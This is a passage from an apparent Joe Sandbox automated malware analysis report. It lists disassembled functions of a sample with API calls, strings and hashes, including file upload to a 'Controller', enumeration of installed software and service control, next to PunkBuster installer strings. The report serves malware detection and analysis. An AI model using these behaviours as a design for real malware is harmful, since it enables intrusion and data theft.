                                              • GetProcAddress.KERNEL32(00000000,?), ref: 000D3F4F
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3F66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                              • API String ID: 2490988753-744132762
                                              • Opcode ID: 72700d5bf6ee7455db990d563be33ad8fa57cf51f19b320e51c9b1b00488d605
                                              • Instruction ID: 7d1bcaabf739f69c34d08a0299c67e30e1bf9e79e416536a64148a11ad47844f
                                              • Opcode Fuzzy Hash: 72700d5bf6ee7455db990d563be33ad8fa57cf51f19b320e51c9b1b00488d605
                                              • Instruction Fuzzy Hash: 3C31C4B290931967C3619B24EC84A8BB7ECAF49744F444A2AF44493340D774DA448BF2
                                              Function 004999D0 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 218COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID: Win32s on Windows 3.1$Windows 2000 (build %lu$Windows 95$Windows 95 OSR2$Windows 98$Windows 98 SE$Windows 9x (%d.%d)$Windows ME$Windows NT %lu.%lu (build %lu$Windows Server 2003 (build %lu$Windows XP (build %lu$tfP
                                              • API String ID: 1889659487-1510680528
                                              • Opcode ID: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction ID: 55906365613c07ecc5b13fb5b21a5f07a9f092eab4f43b9f685ed689dae16b9b
                                              • Opcode Fuzzy Hash: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction Fuzzy Hash: 3071DF70608341AEDB24DB68DC46F6FBBE4BB84704F04892EF1858B2D1D779AC458B5A
                                              Function 000DB824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 000DB846
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000DB88A
                                              • RegCloseKey.ADVAPI32(?), ref: 000DBB54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                              • API String ID: 1332880857-3714951968
                                              • Opcode ID: 17ee7a0ca4174379390018e5b61a040e1de968077848d6587e2d5f89beb307d0
                                              • Instruction ID: 29a25e5e09253747f0503d38b292c6fc46a9abde97217584b20268e8def979f9
                                              • Opcode Fuzzy Hash: 17ee7a0ca4174379390018e5b61a040e1de968077848d6587e2d5f89beb307d0
                                              • Instruction Fuzzy Hash: A68110311083459BD324EB10D891EEFB7E8AF95314F50892EF58692197EF30AA59CB62
                                              Function 000DCA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 000DCAE9
                                              • GetCursorPos.USER32(?), ref: 000DCAF8
                                              • SetForegroundWindow.USER32(?), ref: 000DCB01
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 000DCB1B
                                              • Shell_NotifyIconA.SHELL32(00000002,00133B50), ref: 000DCB6C
                                              • ExitProcess.KERNEL32 ref: 000DCB74
                                              • CreatePopupMenu.USER32 ref: 000DCB7A
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 000DCB8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              • Opcode ID: 18bf7e824ac5b449990dfe080c0726704d2c11f305c313e5d40aaa0a1185ab6f
                                              • Instruction ID: f0f15ae89b26d7c0f3f4a1d5145e97f7f7099fe65547cb7ecbc8a20f76be2f75
                                              • Opcode Fuzzy Hash: 18bf7e824ac5b449990dfe080c0726704d2c11f305c313e5d40aaa0a1185ab6f
                                              • Instruction Fuzzy Hash: 49213D3115420AFFEB1A4F64EE0EEAD3E75FB04311F048116B61595AF0D7B1D990EB24
                                              Function 00104F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID:
                                              • API String ID: 2509303402-0
                                              • Opcode ID: b68d0ee774e86aefc305dbcc800afcb07ab0fb7437fbd69f16bc3275d70f6825
                                              • Instruction ID: 70abee8029a13b3915beb091a15e59d1ab26c250ec4f5d1b17a5414295ad7ba0
                                              • Opcode Fuzzy Hash: b68d0ee774e86aefc305dbcc800afcb07ab0fb7437fbd69f16bc3275d70f6825
                                              • Instruction Fuzzy Hash: 85B17F71D00609EFDB21DFA8C881BEEBBF5BF59300F144069F495A7282D7B5A8558F60
                                              Function 00439B20 Relevance: 21.2, APIs: 14, Instructions: 211windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00439B76
                                              • CreateIconIndirect.USER32(?), ref: 00439BD0
                                              • DeleteObject.GDI32(00000000), ref: 00439BD9
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00439C9E
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00439CA4
                                              • SelectObject.GDI32(00000000,?), ref: 00439CB3
                                              • SelectObject.GDI32(00000000,?), ref: 00439CBF
                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,008800C6), ref: 00439CEB
                                              • SelectObject.GDI32(00000000,?), ref: 00439CFB
                                              • SelectObject.GDI32(00000000,?), ref: 00439D07
                                              • DeleteDC.GDI32(00000000), ref: 00439D10
                                              • DeleteDC.GDI32(00000000), ref: 00439D13
                                              • CreateIconIndirect.USER32(?), ref: 00439D1A
                                              • DeleteObject.GDI32(?), ref: 00439D4C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Create$DeleteSelect$CompatibleIconIndirect$Bitmap
                                              • String ID:
                                              • API String ID: 3399708936-0
                                              • Opcode ID: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction ID: 094c13db3d56746c6d184d65fef74c142a1e1cab74018fb28d94c467a2b62b3a
                                              • Opcode Fuzzy Hash: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction Fuzzy Hash: 237148B1A04340AFC750DF29D980B6BBBE5AB88B50F14596EF989CB351D7B8DC00CB56
                                              Function 004C631B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004C639C
                                              • _strlen.LIBCMT ref: 004C63BC
                                              • _strlen.LIBCMT ref: 004C63CB
                                              • _strlen.LIBCMT ref: 004C63EB
                                              • _strlen.LIBCMT ref: 004C63F8
                                              • _strlen.LIBCMT ref: 004C645E
                                              • GetStdHandle.KERNEL32(000000F4,00510140,00000000,?,00000000,00000000,00000000,00000000), ref: 004C6469
                                              • WriteFile.KERNEL32(00000000), ref: 004C6470
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strlen$File$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 1978235431-4022980321
                                              • Opcode ID: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction ID: 3b83ceba6bd0bb7fa69833b27816d898b07064a94b1dc6de9f3a03ce7699dd3e
                                              • Opcode Fuzzy Hash: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction Fuzzy Hash: 4231F3765002446ADB24AA758CC6FFE3769EB44308F14882FF952D62A2DE7C9651C72C
                                              Function 0040725C Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 114serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00407261
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407360
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407363
                                              Strings
                                              • Uninstall Canceled, xrefs: 00407368
                                              • Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service., xrefs: 00407312
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040729C
                                              • Uninstall canceled. WARNING: The service was *NOT* completely removed., xrefs: 00407375
                                              • PnkBstrA, xrefs: 004072F3
                                              • Message, xrefs: 0040728F
                                              • Installation Canceled, xrefs: 00407305
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Installation Canceled$Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service.$Message$PnkBstrA$Uninstall Canceled$Uninstall canceled. WARNING: The service was *NOT* completely removed.
                                              • API String ID: 4214099978-2742951679
                                              • Opcode ID: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction ID: 7c7ffd2bd437f43fbd6496351136866b800a351aa3a6ac2ed06033c121d4f1a4
                                              • Opcode Fuzzy Hash: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction Fuzzy Hash: 1A41D770D00259AADB00F7A5CD86EFEB7749B10324F60426EE521731D2DB781B05C66A
                                              Function 0011006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 001100B1
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F300
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F312
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F324
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F336
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F348
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F35A
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F36C
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F37E
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F390
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3A2
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3B4
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3C6
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3D8
                                              • _free.LIBCMT ref: 001100A6
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 001100C8
                                              • _free.LIBCMT ref: 001100DD
                                              • _free.LIBCMT ref: 001100E8
                                              • _free.LIBCMT ref: 0011010A
                                              • _free.LIBCMT ref: 0011011D
                                              • _free.LIBCMT ref: 0011012B
                                              • _free.LIBCMT ref: 00110136
                                              • _free.LIBCMT ref: 0011016E
                                              • _free.LIBCMT ref: 00110175
                                              • _free.LIBCMT ref: 00110192
                                              • _free.LIBCMT ref: 001101AA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 7eaa6494a5e5748df8229a9c30899b9c998a7723a219f6f81f6d8d8a1c9a63a3
                                              • Instruction ID: 3bcaaa749e574c989239fd734af71d0abfa6d22e5b6f79267ee36d5448a65757
                                              • Opcode Fuzzy Hash: 7eaa6494a5e5748df8229a9c30899b9c998a7723a219f6f81f6d8d8a1c9a63a3
                                              • Instruction Fuzzy Hash: C7315E31A00704EFDB26AA38D845B9A73E9AF18360F148429F488E7195DFB5EDE4CB10
                                              Function 000C7DEF Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 325fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 000C7F4C
                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 000C7FC2
                                              • __aulldiv.LIBCMT ref: 000C7FE9
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 000C810D
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 000C8128
                                              • CloseHandle.KERNEL32(00000000), ref: 000C8200
                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 000C821A
                                              • CloseHandle.KERNEL32(00000000), ref: 000C8256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                              • API String ID: 1884690901-2596673759
                                              • Opcode ID: 19ee2f8f805bf42f7ad5ac57d232465005bdfc46b33a3e07e1a7902f43335212
                                              • Instruction ID: 4932fb7ce92c58bbca9c57dc21b266de415c5d3193ed164bd017d1a9a763853c
                                              • Opcode Fuzzy Hash: 19ee2f8f805bf42f7ad5ac57d232465005bdfc46b33a3e07e1a7902f43335212
                                              • Instruction Fuzzy Hash: 81B17F316083409BC758FB24D892FEFB7E5AF95310F50491DF88A92293EF70994ACB56
                                              Function 004082BE Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141encryptionmemorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,00000000,004E9570,00000120), ref: 0040833E
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00408351
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,?), ref: 00408374
                                              • LocalFree.KERNEL32(?), ref: 004083A4
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 004083B9
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004083C8
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 004083E6
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408423
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CertNameStringTime$Local$AllocFileSystem$Free
                                              • String ID: %02x $Too Large
                                              • API String ID: 1769289905-1084305061
                                              • Opcode ID: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction ID: 6f341e6902c4afdf672d8c9355eb800609bd8c5a6837686ba94cd697f7e6a9e9
                                              • Opcode Fuzzy Hash: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction Fuzzy Hash: 4E51327194025AAFDB219F64CC81FEDB7F8AF08354F0444BAF988A7291D6749E908F58
                                              Function 00409975 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 124serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040997A
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00409A16
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 00409AB5
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00409B16
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00409B1E
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004099C1
                                              • Battlefield Bad Company 2, xrefs: 004099A3
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 00409A47
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004099BA
                                              • PnkBstrA, xrefs: 00409AAF
                                              • Message, xrefs: 00409A37
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Battlefield Bad Company 2$Message$PnkBstrA$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3
                                              • API String ID: 4214099978-78031187
                                              • Opcode ID: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction ID: 2e18fc910cd73181aa8cc253c752e22f79e2d0258fc9b51ea5b6ac68f69cd406
                                              • Opcode Fuzzy Hash: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction Fuzzy Hash: EE4173B0A402589FD710EB65CC85FEA77B4AF58304F0040BEF50AA7292DB795E85CB69
                                              Function 000D9C85 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 66serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9C94
                                              • OpenServiceW.ADVAPI32(00000000,00000000,,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CAB
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CB8
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CC7
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CD8
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-2599400749
                                              • Opcode ID: e9c4cbff891173bb4475f04e4c7d68e912d5bde066e867556522667cc7f5565d
                                              • Instruction ID: da515d60c9f8dda882935b478f7f8fcc99bb7c43b913ccc55f38d214a0706dbc
                                              • Opcode Fuzzy Hash: e9c4cbff891173bb4475f04e4c7d68e912d5bde066e867556522667cc7f5565d
                                              • Instruction Fuzzy Hash: 2911A932945318AFD72567649D85EFF3FBCDB4B760B004016F505922C1DB64CD46AAB1
                                              Function 0010F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: fa515c3bcacbb2a211df377003f5940c6053c00fb3539ad6c891feaf6d9a1dcc
                                              • Instruction ID: 2ed50f9e91c1ec3a4a93ba56190c4f61c54127c8ae3a4e739dd5389a738a2004
                                              • Opcode Fuzzy Hash: fa515c3bcacbb2a211df377003f5940c6053c00fb3539ad6c891feaf6d9a1dcc
                                              • Instruction Fuzzy Hash: 6AC13576E40209BBDB20DBA8CC43FDAB7F89B18700F144165FA45FB2C6D7B099818B94
                                              Function 00439740 Relevance: 18.1, APIs: 12, Instructions: 134windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(?), ref: 0043976E
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004397DF
                                              • CreateCompatibleDC.GDI32(00000000), ref: 004397F0
                                              • CreateCompatibleDC.GDI32(00000000), ref: 004397F6
